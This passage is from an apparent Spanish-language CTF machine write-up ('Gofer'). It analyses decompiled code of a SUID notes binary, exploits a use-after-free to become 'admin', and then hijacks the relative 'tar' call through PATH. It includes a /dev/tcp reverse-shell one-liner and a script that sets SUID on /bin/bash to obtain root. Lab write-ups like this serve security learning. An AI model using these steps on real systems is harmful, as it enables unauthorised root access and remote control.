      <span class="n">local_10</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x28</span><span class="p">);</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">local_10</span> <span class="o">==</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
                    <span class="cm">/* WARNING: Subroutine does not return */</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
      <span class="p">}</span>
      <span class="n">memset</span><span class="p">(</span><span class="n">local_10</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mh">0x18</span><span class="p">);</span>
      <span class="n">memset</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)((</span><span class="kt">long</span><span class="p">)</span><span class="n">local_10</span> <span class="o">+</span> <span class="mh">0x18</span><span class="p">),</span><span class="mi">0</span><span class="p">,</span><span class="mh">0x10</span><span class="p">);</span>
      <span class="n">_Var1</span> <span class="o">=</span> <span class="n">getuid</span><span class="p">();</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">_Var1</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="o">*</span><span class="p">(</span><span class="n">undefined4</span> <span class="o">*</span><span class="p">)((</span><span class="kt">long</span><span class="p">)</span><span class="n">local_10</span> <span class="o">+</span> <span class="mh">0x18</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x696d6461</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="n">undefined</span> <span class="o">*</span><span class="p">)((</span><span class="kt">long</span><span class="p">)</span><span class="n">local_10</span> <span class="o">+</span> <span class="mh">0x1c</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x6e</span><span class="p">;</span>
      <span class="p">}</span>
      <span class="k">else</span> <span class="p">{</span>
        <span class="o">*</span><span class="p">(</span><span class="n">undefined4</span> <span class="o">*</span><span class="p">)((</span><span class="kt">long</span><span class="p">)</span><span class="n">local_10</span> <span class="o">+</span> <span class="mh">0x18</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x72657375</span><span class="p">;</span>
      <span class="p">}</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">"Choose an username: "</span><span class="p">);</span>
      <span class="n">__isoc99_scanf</span><span class="p">(</span><span class="o">&amp;</span><span class="n">DAT_00102144</span><span class="p">,</span><span class="n">local_10</span><span class="p">);</span>
      <span class="n">puts</span><span class="p">(</span><span class="s">""</span><span class="p">);</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">local_10</span> <span class="o">==</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">puts</span><span class="p">(</span><span class="s">"First create an user!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
      <span class="p">}</span>
      <span class="k">else</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Username: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">local_10</span><span class="p">);</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Role: %s</span><span class="se">\n\n</span><span class="s">"</span><span class="p">,(</span><span class="kt">long</span><span class="p">)</span><span class="n">local_10</span> <span class="o">+</span> <span class="mh">0x18</span><span class="p">);</span>
      <span class="p">}</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="k">case</span> <span class="mi">3</span><span class="p">:</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">local_10</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">free</span><span class="p">(</span><span class="n">local_10</span><span class="p">);</span>
      <span class="p">}</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
      <span class="n">local_18</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x28</span><span class="p">);</span>
      <span class="n">memset</span><span class="p">(</span><span class="n">local_18</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mh">0x28</span><span class="p">);</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">local_18</span> <span class="o">==</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
                    <span class="cm">/* WARNING: Subroutine does not return */</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
      <span class="p">}</span>
      <span class="n">puts</span><span class="p">(</span><span class="s">"Write your note:"</span><span class="p">);</span>
      <span class="n">__isoc99_scanf</span><span class="p">(</span><span class="o">&amp;</span><span class="n">DAT_0010218b</span><span class="p">,</span><span class="n">local_18</span><span class="p">);</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="k">case</span> <span class="mi">5</span><span class="p">:</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">"Note: %s</span><span class="se">\n\n</span><span class="s">"</span><span class="p">,</span><span class="n">local_18</span><span class="p">);</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="k">case</span> <span class="mi">6</span><span class="p">:</span>
      <span class="n">puts</span><span class="p">(</span><span class="s">"Coming soon!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="k">case</span> <span class="mi">7</span><span class="p">:</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">local_18</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">free</span><span class="p">(</span><span class="n">local_18</span><span class="p">);</span>
        <span class="n">local_18</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
      <span class="p">}</span>
      <span class="k">break</span><span class="p">;</span>
    <span class="k">case</span> <span class="mi">8</span><span class="p">:</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">local_10</span> <span class="o">==</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">puts</span><span class="p">(</span><span class="s">"First create an user!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
      <span class="p">}</span>
      <span class="k">else</span> <span class="p">{</span>
        <span class="n">iVar2</span> <span class="o">=</span> <span class="n">strcmp</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)((</span><span class="kt">long</span><span class="p">)</span><span class="n">local_10</span> <span class="o">+</span> <span class="mh">0x18</span><span class="p">),</span><span class="s">"admin"</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">iVar2</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
          <span class="n">puts</span><span class="p">(</span><span class="s">"Access granted!"</span><span class="p">);</span>
          <span class="n">setuid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
          <span class="n">setgid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
          <span class="n">system</span><span class="p">(</span><span class="s">"tar -czvf /root/backups/backup_notes.tar.gz /opt/notes"</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">else</span> <span class="p">{</span>
          <span class="n">puts</span><span class="p">(</span><span class="s">"Access denied: you don</span><span class="se">\'</span><span class="s">t have the admin role!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="p">}</span>
      <span class="p">}</span>
    <span class="p">}</span>
  <span class="p">}</span> <span class="k">while</span><span class="p">(</span> <span class="nb">true</span> <span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Vemos que tenemos un case de 8, en el caso 1, tenemos que se asignan 0x28 bytes usando malloc: <strong>local_10 = malloc(0x28)</strong> que se almacenan en <strong>local_10</strong></p>

<p><strong>Problema 1:</strong></p>

<p>Observa el case 3 el uso de <strong>free</strong>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="mi">3</span><span class="p">:</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">local_10</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">free</span><span class="p">(</span><span class="n">local_10</span><span class="p">);</span>
    <span class="p">}</span>
<span class="k">break</span><span class="p">;</span>
</code></pre></div></div>
<p>Primero se valida que <strong>local_10</strong> no tenga 0, y en caso de que no, osea que tenga memoria asignada, hace un free de <strong>local_10</strong> y entonces ese espacio en memoria se marca como libre para otras asignaciones, el problema es que no hace nada mas, osea que no restablece para que apunte de <strong>NULL</strong>, y entonces <strong>local_10</strong> aun apunta a esa memoria</p>

<ul>
  <li><strong>Problema 2:</strong></li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
    <span class="n">local_18</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x28</span><span class="p">);</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">local_18</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mh">0x28</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">local_18</span> <span class="o">==</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>En el case 4 se asigna otro chunk y lo guarda en <strong>local_18</strong>, pero debido a lo analziado en el problema 1, en realidad <strong>local_10</strong> y <strong>local_18</strong> apuntarian al mismo chunk, entonces nosotros podriamos esbrirbir tantos byes para sobreescribir <strong>local_10</strong></p>

<ul>
  <li><strong>Case 8:</strong></li>
</ul>

<p>Una vez que sabemo que podemos sobreescribir <strong>local_10</strong>, hay que buscar una forma de hacernos <strong>admin</strong> para ejectuar esta funcion:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="mi">8</span><span class="p">:</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">local_10</span> <span class="o">==</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">puts</span><span class="p">(</span><span class="s">"First create an user!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">iVar2</span> <span class="o">=</span> <span class="n">strcmp</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)((</span><span class="kt">long</span><span class="p">)</span><span class="n">local_10</span> <span class="o">+</span> <span class="mh">0x18</span><span class="p">),</span><span class="s">"admin"</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">iVar2</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
          <span class="n">puts</span><span class="p">(</span><span class="s">"Access granted!"</span><span class="p">);</span>
          <span class="n">setuid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
          <span class="n">setgid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
          <span class="n">system</span><span class="p">(</span><span class="s">"tar -czvf /root/backups/backup_notes.tar.gz /opt/notes"</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">else</span> <span class="p">{</span>
          <span class="n">puts</span><span class="p">(</span><span class="s">"Access denied: you don</span><span class="se">\'</span><span class="s">t have the admin role!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Vemos que compara <strong>(char *)((long)local_10 + 0x18)</strong>, esto es el resultado de calcular lo que se encuentra en <strong>local_10</strong> mas <strong>0x18</strong> bytes (24) y lo compara con <strong>admin</strong> y en caso que se la comparacion sea correcta, se establece un <strong>setgid(0);</strong> para el proceso actual</p>

<p><strong>¬øEntonces comos hacemos admin</strong></p>

<ol>
  <li>Primero creamos un usuario con la opcion 1, esto creara un chunk</li>
  <li>Despues liberamos al usuario con la opcion 3, esto hara que <strong>local_10</strong> aun apunte a ese chunk por que no se restablecio con NULL</li>
  <li>Seleccionamos la opcion 4 y crearemos una nota de 24 bytes mas la palabra admin, esto hara que se sobreescriba <strong>loca_10</strong> y ahora el usuario sea <strong>admin</strong></li>
</ol>

<p>Si hicimos todo bien, veran como ya somos <strong>admin</strong></p>

<p><img src="/assets/img/gofer/13.png" alt="" /></p>

<h4 id="path-hijacking">Path Hijacking</h4>

<p>Como ya somos admin, ya podemos ejecutar el case 8, y observa que en ese case hace uso de <strong>system</strong> para mandar a llamar a <strong>tar</strong>, pero lo esta haciendo desde una ruta relativa, asi que nosotros podemos crear un archivo con ese mismo nombre y que ejecute otro comando, en mi caso me ire al directorio <strong>tmp</strong> y creare un archivo con el nombre de tar con el tipico oneliner de bash</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">bash</span> <span class="o">-</span><span class="n">c</span> <span class="s2">"sh -i &gt;&amp; /dev/tcp/&lt;tu_ip&gt;/443 0&gt;&amp;1"</span>
</code></pre></div></div>

<p>Despues exportare tmp al PATH: <strong>export PATH=/tmp:$PATH</strong></p>

<p>Y por ultimo me pondre en escucha desde otra terminal y volvere a ejecutar el binario <strong>notes</strong> para hacerme admin y ejecutar el case 8</p>

<p>Oberva como nos llego una shell como root y del lado derecho nos dice <strong>Acess granted</strong>:</p>

<p><img src="/assets/img/gofer/14.png" alt="" /></p>

<p>No hacia falta mandarnos un rev shell, simplemente puden darle permisos SUID la bash, asi:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>
<span class="nb">chmod </span>u+s /bin/bash
</code></pre></div></div>
<p>Y despues ejectuar un <strong>bash -p</strong></p>

<p>Eso ha sido todo, gracias por leer ‚ù§</p>

:ET